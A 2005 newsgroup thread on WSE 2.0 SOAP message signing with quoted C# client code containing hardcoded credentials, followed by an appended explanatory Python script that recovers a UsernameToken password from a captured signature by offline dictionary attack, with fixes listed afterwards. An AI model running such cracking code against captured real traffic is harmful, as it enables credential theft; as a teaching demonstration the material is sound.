Re: WSE 2.0 security problem
From: William Stacey [MVP] (staceywREMOVE_at_mvps.org)
Date: 02/04/05
- Next message: Paul Aspinall: "Packaging MSDE in with Winforms C# app, using Windows packages"
- Previous message: VMI: "making sure <Enter> key always works???"
- In reply to: Michael Rodriguez: "Re: WSE 2.0 security problem"
- Messages sorted by: [ date ] [ thread ]
Date: Fri, 4 Feb 2005 15:32:27 -0500
The one problem you still have is signing the message with the user token.
This is *not secure in the least. That password would be cracked in a few
seconds off the wire - *even if you use SendNone. Hacker just does the
dictionary attack on the signature. UsernameTokens should only be sent if
they are encrypted first - either inside an SSL session or using a
SecurityContextToken. If you use a SCT, then you don't need to send the UT
anyway. So I would use only SCTs and require on the server each message is
at *least signed with an *authenticated SCT (or a token derived from an
authenticated SCT).
See:
http://spaces.msn.com/members/staceyw/Blog/cns!1pnsZpX0fPvDxLKC6rAAhLsQ!303.entry
http://spaces.msn.com/members/staceyw/Blog/cns!1pnsZpX0fPvDxLKC6rAAhLsQ!268.entry
http://msdn.microsoft.com/webservices/default.aspx?pull=/library/en-us/dnwse/html/securusernametoken.asp
--
William Stacey, MVP
http://mvp.support.microsoft.com

"Michael Rodriguez" <mike__at__compeat_dot_com> wrote in message
news:67FC8DFC-14C8-443B-A717-D758C5393B59@microsoft.com...
> Nicholas,
>
> Thanks for the quick response. I figured out what it was. I enabled
> tracing in the web.config so I could see the SOAP responses. When I looked
> at those, I saw the problem was a timeout error. I had set the TimeToLive to
> 2 minutes, and the computer I was sending the request from was 10 minutes
> behind the Web server! All I had to do was sync the time and then it worked
> fine.
>
> Thanks,
>
> Mike Rodriguez
>
> "Nicholas Paldino [.NET/C# MVP]" wrote:
>
> > Michael,
> >
> > Are you sure that you are signing the message? The code here just adds
> > some authentication, but I see nothing that loads a digital certificate (is
> > that what the MessageCertificate does?).
> >
> > Also, if you have a certificate loaded in a store on the machine that is
> > doing the signing (your dev machine), then you have to make sure that
> > certificate is installed on the other machine that you installed the proxy
> > on.
> >
> > Hope this helps.
> >
> > --
> > - Nicholas Paldino [.NET/C# MVP]
> > - mvp@spam.guard.caspershouse.com
> >
> > "Michael Rodriguez" <mike__at__compeat_dot_com> wrote in message
> > news:C57EC39E-645A-4A0B-B205-C7EC27E6C1C6@microsoft.com...
> > > I have a web service that I am calling by digitally signing the message
> > > with WSE 2.0 SP2. It runs fine on my PC. I uploaded the WS to our server,
> > > and if I call that from my PC that also works fine.
> > >
> > > The problem comes in when I try to call the WS from another machine
> > > besides mine or the host server. When I do that, I get "An error was
> > > discovered processing the <Security> header"...
> > >
> > > Is there something else I need to install on other machines to get my WSE
> > > security working? I installed the WSE 2.0 runtime files, that didn't
> > > help. Any ideas?
> > >
> > > Here is the client code that calls the web service:
> > >
> > > public CateringWS.DataServWse GetProxy()
> > > {
> > >     CateringWS.DataServWse proxy = new CateringWS.DataServWse();
> > >     proxy.Url = "http://my_ip_address_here/CateringWS/DataServ.asmx";
> > >
> > >     // Get the SoapContext for the SOAP request that is being made to the Web service
> > >     SoapContext reqCtx = proxy.RequestSoapContext;
> > >
> > >     // Add the UsernameToken to the WS-Security SOAP header
> > >     /* Help File Excerpt: The password is never sent in any form in the SOAP message,
> > >      * but WSE does use the password to sign the SOAP message.
> > >      * A recipient would then need to provide a password to WSE
> > >      * during the signature validation stage. */
> > >     UsernameToken tok = new UsernameToken("mike", "amanda1", PasswordOption.SendNone);
> > >
> > >     // set the TimeToLive to 2 minutes, to prevent anyone else from replaying it
> > >     reqCtx.Security.Timestamp.TtlInSeconds = 120;
> > >
> > >     // Digitally sign the SOAP request by using a user name and password.
> > >     reqCtx.Security.Tokens.Add(tok);
> > >     reqCtx.Security.Elements.Add(new MessageSignature(tok));
> > >     // reqCtx.Security.Elements.Add(new EncryptedData(tok));
> > >
> > >     return proxy;
> > > }
> > >
> > > public ChartOfAccountsInfo[] GetChartOfAccounts()
> > > {
> > >     CateringWS.DataServWse proxy = GetProxy();
> > >     try
> > >     {
> > >         return proxy.GetChartOfAccounts();
> > >     }
> > >     catch (Exception ex)
> > >     {
> > >         throw new ApplicationException(ex.Message);
> > >     }
> > > }
> > >
> > > TIA,
> > >
> > > Mike Rodriguez
> > >
> > > --
> > > To understand recursion, we must first understand recursion.
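Why the warning at the top of this reply holds, as an added example that is not part of the thread and is not WSE 2.0 code: with PasswordOption.SendNone the password itself never appears in the SOAP message, but the HMAC key that signs the message is derived from the password plus two values that do travel in the clear (the token's Nonce and Created). Anyone who captures one signed request can derive a candidate key from each wordlist entry and test it against the SignatureValue locally, at hash speed, with no round trip to the server, and the 120-second Timestamp TTL from the quoted client code does nothing against this because nothing is ever replayed. The key derivation below (P_SHA1 over a fixed label, the nonce and the created time, yielding a 24-byte key) and the simplified SignedInfo stand-in are assumptions for illustration; the attack is the same against any derivation whose only secret input is the password. The username and password are the ones from the quoted client code; the wordlist and message body are constructed.

```python
"""
Offline dictionary attack on a WS-Security UsernameToken (SendNone) signature.

Constructed example. Models: client derives an HMAC key from the password plus
public Nonce/Created, signs the message; server rebuilds the key from its copy
of the plaintext password; attacker rebuilds keys from a wordlist instead.
"""
import base64
import hashlib
import hmac
import os
from datetime import datetime, timedelta, timezone

KEY_LABEL = b"WS-Security"  # assumption: fixed label mixed into the key seed
KEY_LEN = 24                # assumption: 192-bit HMAC-SHA1 signing key


def p_sha1(secret: bytes, seed: bytes, length: int) -> bytes:
    """TLS-style P_SHA1 expansion (RFC 2246 section 5): A(i) chain of HMAC-SHA1."""
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha1).digest()
        out += hmac.new(secret, a + seed, hashlib.sha1).digest()
    return out[:length]


def derive_signing_key(password: str, nonce: bytes, created: str) -> bytes:
    """Everything feeding the key except the password is visible on the wire."""
    seed = KEY_LABEL + nonce + created.encode()
    return p_sha1(password.encode("utf-8"), seed, KEY_LEN)


def signed_info(body: str, created: str, expires: str) -> bytes:
    """Simplified stand-in for the canonicalised <SignedInfo>: digests of the
    signed parts (Body and Timestamp). The real element is XML, but in both
    cases the HMAC input is fully public."""
    body_digest = hashlib.sha1(body.encode()).hexdigest()
    ts_digest = hashlib.sha1(f"{created}|{expires}".encode()).hexdigest()
    return f"Body={body_digest};Timestamp={ts_digest}".encode()


def sign_message(username, password, body, created=None, ttl_seconds=120):
    """Client side: what a SendNone UsernameToken plus MessageSignature puts on the wire."""
    now = created or datetime.now(timezone.utc)
    created_s = now.strftime("%Y-%m-%dT%H:%M:%SZ")
    expires_s = (now + timedelta(seconds=ttl_seconds)).strftime("%Y-%m-%dT%H:%M:%SZ")
    nonce = os.urandom(16)
    key = derive_signing_key(password, nonce, created_s)
    sig = hmac.new(key, signed_info(body, created_s, expires_s), hashlib.sha1).digest()
    return {  # note: no password field anywhere in the message
        "Username": username,
        "Nonce": base64.b64encode(nonce).decode(),
        "Created": created_s,
        "Expires": expires_s,
        "Body": body,
        "SignatureValue": base64.b64encode(sig).decode(),
    }


def verify_message(msg, password_lookup) -> bool:
    """Server side: needs each user's plaintext password to rebuild the key."""
    key = derive_signing_key(password_lookup(msg["Username"]),
                             base64.b64decode(msg["Nonce"]), msg["Created"])
    info = signed_info(msg["Body"], msg["Created"], msg["Expires"])
    expected = hmac.new(key, info, hashlib.sha1).digest()
    return hmac.compare_digest(expected, base64.b64decode(msg["SignatureValue"]))


def crack_password(msg, wordlist):
    """Attacker side: only the captured message and a wordlist. The Timestamp
    TTL never matters here; no guess is sent anywhere, so 'expired' never applies."""
    nonce = base64.b64decode(msg["Nonce"])
    target = base64.b64decode(msg["SignatureValue"])
    info = signed_info(msg["Body"], msg["Created"], msg["Expires"])
    for guess in wordlist:
        key = derive_signing_key(guess, nonce, msg["Created"])
        if hmac.compare_digest(hmac.new(key, info, hashlib.sha1).digest(), target):
            return guess
    return None


# Constructed sample: credentials from the quoted client code, a tiny wordlist.
CAPTURED = sign_message("mike", "amanda1", "<GetChartOfAccounts/>")
WORDLIST = ["password", "123456", "mike", "amanda", "amanda1", "letmein"]

if __name__ == "__main__":
    assert verify_message(CAPTURED, lambda u: {"mike": "amanda1"}[u])
    print("captured message:", CAPTURED)
    print("recovered password:", crack_password(CAPTURED, WORDLIST))
```

A real wordlist is millions of entries and each guess costs a handful of SHA-1 operations, so a password like the one in the quoted code falls in well under the "few seconds" quoted above. The two fixes in the reply both remove the attacker's input: sending the UsernameToken only inside SSL keeps the Nonce, Created and SignatureValue off the wire, and signing with a SecurityContextToken (or a key derived from one) replaces the password-derived key with a negotiated high-entropy one that no dictionary covers.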